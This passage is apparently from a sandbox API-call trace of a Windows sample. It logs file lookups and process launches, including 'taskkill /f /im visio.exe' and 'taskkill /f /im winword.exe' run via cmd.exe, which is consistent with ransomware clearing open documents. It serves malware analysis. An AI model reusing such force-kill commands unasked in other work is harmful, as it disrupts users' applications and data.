fInfoLevelId=0x0, lpFileInformation=0x12497598 | out: lpFileInformation=0x12497598*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.201] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.201] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124975e8 | out: lpFileInformation=0x124975e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.202] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.202] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12497638 | out: lpFileInformation=0x12497638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.202] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.202] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12497688 | out: lpFileInformation=0x12497688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.202] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.202] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124976d8 | out: lpFileInformation=0x124976d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.202] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.202] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12497728 | out: lpFileInformation=0x12497728*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.202] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.202] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247d110, nSize=0x64 | out: lpBuffer="") returned 0x63 [0226.202] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497778 | out: lpFileInformation=0x12497778*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0226.203] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247d1e0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0226.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124977c8 | out: lpFileInformation=0x124977c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0226.203] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0226.203] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0226.203] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0226.203] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0226.203] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0226.203] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0226.203] GetEnvironmentStringsW () returned 0x8ea900* [0226.204] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0226.204] GetCurrentProcess () returned 0xffffffff [0226.204] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a93c0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a93c0*=0x154) returned 1 [0226.204] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a93c4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a93c4*=0x158) returned 1 [0226.204] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a93c8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a93c8*=0x130) returned 1 [0226.204] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im visio.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124eca80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im visio.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0x4e4, dwThreadId=0x8d4)) returned 1 [0226.229] CloseHandle (hObject=0x13c) returned 1 [0226.229] CloseHandle (hObject=0x130) returned 1 [0226.229] CloseHandle (hObject=0x158) returned 1 [0226.229] CloseHandle (hObject=0x154) returned 1 [0226.229] CloseHandle (hObject=0x144) returned 1 [0226.229] CloseHandle (hObject=0x138) returned 1 [0226.229] CloseHandle (hObject=0x134) returned 1 [0226.230] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0227.425] SetEvent (hEvent=0x150) returned 1 [0227.425] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0227.425] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x124f80a0, lpExitTime=0x124f80a8, lpKernelTime=0x124f80b0, lpUserTime=0x124f80b8 | out: lpCreationTime=0x124f80a0, lpExitTime=0x124f80a8, lpKernelTime=0x124f80b0, lpUserTime=0x124f80b8) returned 1 [0227.425] CloseHandle (hObject=0x140) returned 1 [0227.426] SetEvent (hEvent=0x128) returned 1 [0227.426] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0227.431] SetEvent (hEvent=0x150) returned 1 [0227.431] SetEvent (hEvent=0x128) returned 1 [0227.431] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248b1e0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0227.431] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a37c8 | out: lpFileInformation=0x124a37c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.432] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.432] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a3818 | out: lpFileInformation=0x124a3818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.432] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.432] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3868 | out: lpFileInformation=0x124a3868*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.432] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.432] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a38b8 | out: lpFileInformation=0x124a38b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.432] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a3908 | out: lpFileInformation=0x124a3908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.433] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a3958 | out: lpFileInformation=0x124a3958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.433] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a39a8 | out: lpFileInformation=0x124a39a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.433] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a39f8 | out: lpFileInformation=0x124a39f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.433] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a3a48 | out: lpFileInformation=0x124a3a48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.433] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.433] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a3a98 | out: lpFileInformation=0x124a3a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.434] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.434] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a3ae8 | out: lpFileInformation=0x124a3ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.434] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.434] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a3b38 | out: lpFileInformation=0x124a3b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.434] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0227.434] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248b2b0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0227.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3b88 | out: lpFileInformation=0x124a3b88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0227.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248b380, nSize=0x64 | out: lpBuffer="") returned 0x35 [0227.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3bd8 | out: lpFileInformation=0x124a3bd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0227.434] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0227.435] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0227.435] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0227.435] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0227.435] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0227.435] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0227.435] GetEnvironmentStringsW () returned 0x8ea900* [0227.435] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0227.435] GetCurrentProcess () returned 0xffffffff [0227.435] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b96f0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b96f0*=0x144) returned 1 [0227.435] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b96f4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b96f4*=0x154) returned 1 [0227.435] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b96f8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b96f8*=0x158) returned 1 [0227.436] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im winword.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124dd500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im winword.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0x514, dwThreadId=0x560)) returned 1 [0227.494] CloseHandle (hObject=0x130) returned 1 [0227.494] CloseHandle (hObject=0x158) returned 1 [0227.494] CloseHandle (hObject=0x154) returned 1 [0227.494] CloseHandle (hObject=0x144) returned 1 [0227.494] CloseHandle (hObject=0x140) returned 1 [0227.494] CloseHandle (hObject=0x134) returned 1 [0227.494] CloseHandle (hObject=0x138) returned 1 [0227.495] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0228.631] SetEvent (hEvent=0x150) returned 1 [0228.631] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0228.632] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x124f4660, lpExitTime=0x124f4668, lpKernelTime=0x124f4670, lpUserTime=0x124f4678 | out: lpCreationTime=0x124f4660, lpExitTime=0x124f4668, lpKernelTime=0x124f4670, lpUserTime=0x124f4678) returned 1 [0228.632] CloseHandle (hObject=0x13c) returned 1 [0228.632] SetEvent (hEvent=0x128) returned 1 [0228.632] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0228.637] SetEvent (hEvent=0x150) returned 1 [0228.638] SetEvent (hEvent=0x128) returned 1 [0228.638] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247d2b0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0228.638] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497818 | out: lpFileInformation=0x12497818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.638] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 